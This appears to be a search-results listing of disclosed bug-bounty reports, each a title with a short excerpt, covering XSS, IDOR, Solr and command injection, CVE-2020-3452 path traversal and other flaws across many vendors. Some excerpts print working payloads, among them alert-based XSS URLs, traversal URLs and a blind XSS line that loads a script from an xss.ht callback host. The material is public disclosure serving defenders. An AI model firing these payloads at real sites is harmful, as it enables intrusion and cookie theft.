15267 matches found
Uber: Critical Information disclosure of rtapi token for any user via https://video-support-staging.uber.com/video/api/getPopulousUser
The researcher has identified that the API endpoint can be leveraged to return a sensitive token that can be leveraged for access to rtapi endpoints. As example change x-uber-token value with the following found code:...
Automattic: [api.tumblr.com] Exploiting clickjacking vulnerability to trigger self DOM-based XSS
Hello, I have found a clickjacking vulnerability in https://api.tumblr.com/console/ and a self DOM-based XSS in https://api.tumblr.com/console/calls/user/follow/unfollow. An attacker can exploit the clickjacking to trigger the self DOM-based XSS. Vulnerable URL to clickjacking :...
PortSwigger Web Security: SMTP interaction theft via MITM
See http://www.postfix.org/CVE-2011-0411.html for a detailed description. Impact MitM could obtain user credentials...
Zomato: [api.zomato.com] Abusing LocalParams (city_id) to Inject SOLR query
Disclosing it as per the request from @zzzhacker13. This report is identical to 844428 but this one was on a different endpoint. POC - - :v2/red/homepage.json?lat=&lon=&cityid=!dismax+df=cityid86&androidcountry=US&lang=en&androidlanguage=en Zomato Security Team...
Shopify: Ability to publish a paid theme without purchasing it.
Hi, Description I kept looking for alternatives to my report 927567 and I found another way to publish a paid theme without having to purchase it. This time the trick is to send "ThemePublishLegacy" XHR request while the theme is being installed. Requirements 1. Google Chrome suggested because...
TikTok: Multiple Cross-Site Scripting vulnerability via the language parameter
A cross site scripting vulnerability was reported across multiple TikTok domains leveraging the language parameter. This issue has been promptly resolved. We thank @luizviana for reporting this to our team and confirming the resolution...
TikTok: Cross Site Scripting using Email parameter in Ads endpoint 1
A cross site scripting vulnerability was found in the ads endpoint using the email parameter. This issue has been resolved. We thank @luizviana for reporting this to our team and confirming the resolution...
Mail.ru: Stored XSS in history on [corporate.city-mobil.ru]
Stored XSS in view history functionality on corporate.city-mobil.ru...
Kubernetes: CVE-2019-11250 remains in effect.
Report Submission Form Summary: "CVE-2019-11250: TOB-K8S-001: Bearer tokens are revealed in logs" remains in effect. Kubernetes Version: Affects at least all versions since 1.4. - This was determined with some git archaeology. This was determined by following the code snippet from its current...
Zomato: Solr Injection in `user_id` parameter at :/v2/leaderboard_v2.json
@zzzhacker13 identified a Solr Injection on the userid parameter at :/v2/leaderboardv2.json. Our team analyzed internally and found that only fq=injection was possible on the Solr endpoint, hence the Solr injection was of low impact since there was no way to escalate it to exfiltrate data, one...
Nextcloud: Possible denial of service when entering a loooong password
You can create a very long password until you get the last user to put and aries or DoS. Normally passwords have 8-10-24 digits. By sending a very long password 1.000.000 characters Usually this problem is caused by a vulnerable password hashing implementation. When a long password is sent, the...
Mail.ru: Ability to edit the address of any company by its id on [corporate.city-mobil.ru]
IDOR vulnerability in corporate.city-mobil.ru interface allowed to edit the address of any company...
Acronis: Subdomain Takeover – jet.acronis.com pointing to unclaimed Webflow services
Hi Team, Greetings! I've come across jet.acronis.com of acronis.com pointing to an unclaimed Webflow service. Visiting jet.acronis.com returned the default 404 page for the Webflow service, thereby making it a potential subdomain takeover. F937948 jet.acronis.com CNAME pointed to...
LY Corporation: Deleting someone else's profile image with a GraphQL query in programming education service (https://entry.line.me)
LINE entry is a service that provides programming education for children https://entry.line.me. LINE entry provides users with the ability to add profile images. It was possible to delete other people's profile images or thumbnails using a GraphQL query...
Shopify: Admin web sessions remain active after logout of Shopify ID
Previously, on 837729, a session is still valid and the store password can be seen. This time I report that the session is still valid despite changing the email address on the Shopify account. Summary: accounts that have changed email addresses still have permission to enter the store through...
██████: Android: Explanation of Access to app protected components vulnerability
████████████████████████████...
Hyperledger: Vulnerabilities in Endorsement Mechanism of Private Data Related Transactions in Hyperledger Fabric 2.0
To whom it may concern, We report design flaws that can be exploited by private data collection non-member organizations to forge endorsements of read-related transactions and return fake values to a user. When a user issues a read-only transaction proposal to an endorser in the private data...
U.S. Dept Of Defense: [CVE-2020-3452] Unauthenticated file read in Cisco ASA
Hey, I found out that host ████████.mil was vulnerable to CVE-2020-3452. You can test it by visiting the URL: https://██████████.mil/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=%2bCSCOE%2b/portalinc.lua To try it with CURL please run the following command:...
U.S. Dept Of Defense: CVE-2020-3452, unauthenticated file read in Cisco ASA & Cisco Firepower.
Summary: The affected IP: █████ Here is a POC of CVE-2020-3452, unauthenticated file read in Cisco ASA & Cisco Firepower. For example, to read the "/+CSCOE+/portalinc.lua" file: ████/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portalinc.lua&default-language&lang=../ Suggested...
Node.js third-party modules: [m-server] XSS reflected because path does not escapeHtml
I would like to report XSS in m-server. It allows an attacker to perform XSS on the client side. Module module name: m-server version: 1.4.2 npm page: https://www.npmjs.com/package/m-server Module Description M-Server is a mini http static server that without any dependencies; Module Stats 1 weekly...
Automattic: Site-wide CSRF at Atavist
Summary: Hi team, I have an Atavist Magazine account, and there are no CSRF tokens on account settings. For example: - When changing email there is a user ID but they are sequential : F936597 - Deleting credit card : F936618 - Cancelling subscription :...
Node.js third-party modules: [freespace] Command Injection due to Lack of Sanitization
I would like to report Command Injection in the freespace module. It allows an attacker to inject and execute shell commands on Unix based systems. Module module name: freespace version: 1.0.4 npm page: https://www.npmjs.com/package/freespace Module Description A library that tells you how much...
Automattic: Can buy Atavist Magazine subscription for free
Summary: Hi team If you go to https://magazine.atavist.com/ and scroll down. You will see membership price is $25, but I found a way to buy this subscription for free via Gift feature. When you send gift request before adding any credit card to your account you will see this response : F936531...
Mail.ru: Public access to Sidekiq dashboard at shopper.sbermarket.ru
Anonymous access to Sidekiq process dashboard was available on shopper.sbermarket.ru...
Automattic: IDOR when editing email leads to Account Takeover on Atavist
Summary: Hi team, I created an account on Atavist and checked my settings page. I can change my email at https://magazine.atavist.com/cms/reader/account with this request : F936117 And as you can see, there is a id parameter on request data. It's our user ID, and it's vulnerable for IDOR. So we c...
QIWI: [z.tochka.com] Unlimited file uploads lead to malware executed
Hi. I found a File Upload when uploading an image in the bank's support chat. The malware gets uploaded to z.tochka.com, which means it is trusted. 1. Go to the chat 2. Upload the malware; we can encrypt it, or simply upload a .bat file that will perform some actions on employees' devices 3...
Automattic: Reflected XSS at /category/ on an Atavist theme
Summary: Hi team, This report is similar to 947790 You fixed the XSS on search, but I found another XSS at /category/xsspayload For PoC you can check these URLs : https://magazine.atavist.com/category/%22%3E%3Csvg%20onload%3Dalert%60XSS%60%3E...
U.S. Dept Of Defense: Reflected XSS in https://www.█████/
Hello Security Team, I would like to report an XSS vulnerability on your system. Steps To Reproduce: Visit the following POC link and move your mouse all over the index page: https://www.████/Z%22onmouseover=alert%60%60%20%22/████████/█████.aspx 1. Tested on Firefox browser: ███████ 2. Tested on googl...
Mail.ru: Possible access to the car's photo and registration by its ID on [fleet.city-mobil.ru]
Car / driver's license photo cropped with built-in photo editor of fleet.city-mobil.ru could get a predictable name...
Mail.ru: Disclosure of personal support email addresses on 'support-fleet.city-mobil.ru'
IDOR vulnerability in support-fleet.city-mobil.ru allowed to disclose the support staff e-mail addresses...
Zomato: Lack of Password Confirmation for Account Deletion
Description: The issue in the Zomato Android application is that the user account can be deleted without confirming the user password or re-authentication. Account removal is one of the sensitive parts of any application that needs protection; therefore removing an account should validate the...
Internet Bug Bounty: Use after free vulnerability in phar_parse_zipfile
A malformed phar file with cache configuration leads to freed memory being used as a hash key when it is inserted into the hash table. More detailed information and the original report are here: https://bugs.php.net/bug.php?id=79797 and it was assigned CVE-2020-7068. Impact Through this vulnerability that inserts freed memor...
Mail.ru: HTML Injection at "city-mobil.ru"
HTML Injection in city-mobil.ru on driver recruitment page...
Node.js third-party modules: [@knutkirkhorn/free-space] - Command Injection through Lack of Sanitization
I would like to report Command Injection in the free-space module. It allows arbitrary shell command execution on Unix-based systems Module module name: free-space version: 1.2.0 npm page: https://www.npmjs.com/package/free-space Module Description Get the amount of free space for a drive Module...
GitLab: Store-XSS in error message of build-dependencies
Hi, A stored XSS exists in the error message of build-dependencies. Fortunately it currently does not exist on gitlab.com. It seems that gitlab.com disables the dependencies validation. However, this feature is enabled by default in self-managed installations. Steps to reproduce The following steps...
New Relic: HTML injection at Alert email
@wi11 discovered an issue with Alerts notification emails where supplied HTML tags would be rendered by the email generator. This could allow an attacker to embed arbitrary hyperlinks or images under the header in those Alerts emails. Some people asked me about this bug, so I give a simple...
Bumble: XSS in biodata
I did the injection with the payload, see mp4. I did the 1st and 2nd experiments. Sorry for the 1st experiment, I didn't take a video. When I did the first injection, there was an error after pressing the OK button. Impact the impact could have been someone who stole cookies...
Nextcloud: DoS attack against the client when entering a long password
Hi team, My report is like 840598: entering a long password causes a denial of service attack on the server, please fix it .. Steps .. 1. Create an account on https://nextcloud.com/signup/ 2. Enter any password and login . 3. After you login go to your settings . 4. go to here...
Mail.ru: SECRET_KEY Of Django Leaked In maps.me
Token for an internal Jenkins account of maps.me was leaked via git commit...
Mail.ru: relap.io/admin/api - admin API accessible without authentication
Admin interface opened to external network without authentication on relap.io...
Mail.ru: [webvpn.city-srv.ru] Path traversal via CVE-2020-3452
CVE-2020-3452 on webvpn.city-srv.ru...
Ruby on Rails: XSS by file (Active Storage `Proxying`)
Hello, I've seen similar issues with 407319 and 429868 occur with Active Storage's new File serving strategies Proxying. Commit is https://github.com/rails/rails/commit/dfb5a82b259e134eac89784ac4ace0c44d1b4aee. ruby...
Automattic: DOM-Based XSS in tumblr.com
Description Hi, I would like to report a DOM-Based XSS that is exactly like this one, 882546; this one works just because the page /reblog/ID/OTHERID doesn't have a correct CSP rule. Steps to reproduce 1. go to https://www.tumblr.com/reblog/620008931446652928/JBuEvzz5 2. click in click me 3. click ...
Valve: Shell command injection in https://partner.steamgames.com/admin/game/publish/ via screenshot URL
Shell command injection in https://partner.steamgames.com/admin/game/publish/ via screenshot URL The vulnerability allowed insufficient validation of parameters, which permitted the injection of shell metacharacters into values used to construct a Bash command...
Dropcontact: Unrestricted File Upload on https://app.dropcontact.io/app/upload/
Hi team, I found an Unrestricted File Upload vulnerability on https://app.dropcontact.io/app/upload/. Steps To Reproduce: 1. Create an account in https://app.dropcontact.io/app/ 2. go to https://app.dropcontact.io/app/upload/ 3. try to upload html file , you will see message only : .csv, .txt, .xl...
Mail.ru: Information Disclosure
Performance metrics were available at instamart.ru...
Shopify: Blind Stored XSS Via Staff Name
Hey Team, I found a blind stored XSS when I add a staff name in https://your-store.myshopify.com/admin/settings/account Steps to reproduce : 1. Go to https://your-store.myshopify.com/admin/settings/account 2. Add Staff Account 3. Fill First & Last Name with this payload "$.getScript"//█████████.xss.ht...
curl: Connect-only connections can use the wrong connection
Summary: If a connect-only easy handle is not read from or written to, its connection can time out and be closed. If a new connection is created it can be allocated at the same address, causing the easy handle to use the new connection. This new connection may not be connected to the same server ...
Mail.ru: In Samokat it is possible to view and modify the data of any order without authorization
IDOR in smart.space API allowed to change orders and list items of order content...
Courier: Broken Authentication Session Token Bug
Hi Team, hope you are well. I have found a broken authentication issue in https://www.trycourier.app Steps to reproduce 1. Create a courier account or use an existing one. 2. Confirm your email address. 3. Now log out from your account and request a password reset code for your account . 4. Don't u...